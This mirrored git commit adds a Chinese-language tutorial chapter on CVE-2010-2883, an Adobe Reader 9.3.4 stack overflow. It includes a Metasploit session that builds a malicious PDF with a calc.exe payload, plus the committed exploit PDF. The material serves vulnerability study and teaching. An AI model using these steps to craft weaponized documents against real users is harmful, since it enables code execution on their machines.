mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-25 11:41:16 +07:00
add 7.1.8
This commit is contained in:
parent
1ce79c2974
commit
f1c51d8ea3
@ -174,6 +174,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
|||||||
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
|
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
|
||||||
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
|
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
|
||||||
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
|
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
|
||||||
|
* [7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow](doc/7.1.8_adobe_reader_2010-2883.md)
|
||||||
* Malware
|
* Malware
|
||||||
* [八、学术篇](doc/8_academic.md)
|
* [八、学术篇](doc/8_academic.md)
|
||||||
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
|
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
|
||||||
|
52
doc/7.1.8_adobe_reader_2010-2883.md
Normal file
52
doc/7.1.8_adobe_reader_2010-2883.md
Normal file
@ -0,0 +1,52 @@
|
|||||||
|
# 7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow
|
||||||
|
|
||||||
|
- [漏洞描述](#漏洞描述)
|
||||||
|
- [漏洞复现](#漏洞复现)
|
||||||
|
- [漏洞分析](#漏洞分析)
|
||||||
|
- [参考资料](#参考资料)
|
||||||
|
|
||||||
|
|
||||||
|
[下载文件](../src/exploit/7.1.8_adobe_reader_2010-2883)
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有 TTF 字体的 Smart INdependent Glyphlets (SING) 表格中超长字段的 PDF 文件执行任意代码或者导致拒绝服务。
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
| |推荐使用的环境 | 备注 |
|
||||||
|
| --- | --- | --- |
|
||||||
|
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||||||
|
| 调试器 | WinDbg | 版本号:10.0 x86 |
|
||||||
|
| 漏洞软件 | Adobe Reader | 版本号:9.3.4 |
|
||||||
|
|
||||||
|
我们利用 Metasploit 来生成攻击样本:
|
||||||
|
```
|
||||||
|
msf > search cve-2010-2883
|
||||||
|
Name Disclosure Date Rank Description
|
||||||
|
---- --------------- ---- -----------
|
||||||
|
exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
|
||||||
|
|
||||||
|
msf > use exploit/windows/fileformat/adobe_cooltype_sing
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/exec
|
||||||
|
payload => windows/exec
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > set cmd calc.exe
|
||||||
|
cmd => calc.exe
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > set filename cve20102883.pdf
|
||||||
|
filename => cve20102883.pdf
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit
|
||||||
|
[*] Creating 'cve20102883.pdf' file...
|
||||||
|
[+] cve20102883.pdf stored at /home/firmy/.msf4/local/cve20102883.pdf
|
||||||
|
```
|
||||||
|
|
||||||
|
使用漏洞版本的 Adobe Reader 打开样本,即可弹出计算器:
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞分析
|
||||||
|
|
||||||
|
## 参考资料
|
||||||
|
- 《漏洞战争》
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2883/
|
@ -8,4 +8,5 @@
|
|||||||
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
|
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
|
||||||
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
|
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
|
||||||
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
|
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
|
||||||
|
* [7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow](7.1.8_adobe_reader_2010-2883.md)
|
||||||
* Malware
|
* Malware
|
||||||
|
@ -8,6 +8,7 @@
|
|||||||
- [PortEx Analyzer](#portex-analyzer)
|
- [PortEx Analyzer](#portex-analyzer)
|
||||||
- [Resource Hacker](#resource-hacker)
|
- [Resource Hacker](#resource-hacker)
|
||||||
- [wxHexEditor](#wxhexeditor)
|
- [wxHexEditor](#wxhexeditor)
|
||||||
|
- [PDF Stream Dumper](#pdf-stream-dumper)
|
||||||
|
|
||||||
|
|
||||||
## 010 Editor
|
## 010 Editor
|
||||||
@ -35,3 +36,6 @@ http://www.angusj.com/resourcehacker/
|
|||||||
|
|
||||||
## wxHexEditor
|
## wxHexEditor
|
||||||
http://www.wxhexeditor.org/
|
http://www.wxhexeditor.org/
|
||||||
|
|
||||||
|
## PDF Stream Dumper
|
||||||
|
http://sandsprite.com/blogs/index.php?uid=7&pid=57
|
||||||
|
BIN
src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf
Normal file
BIN
src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user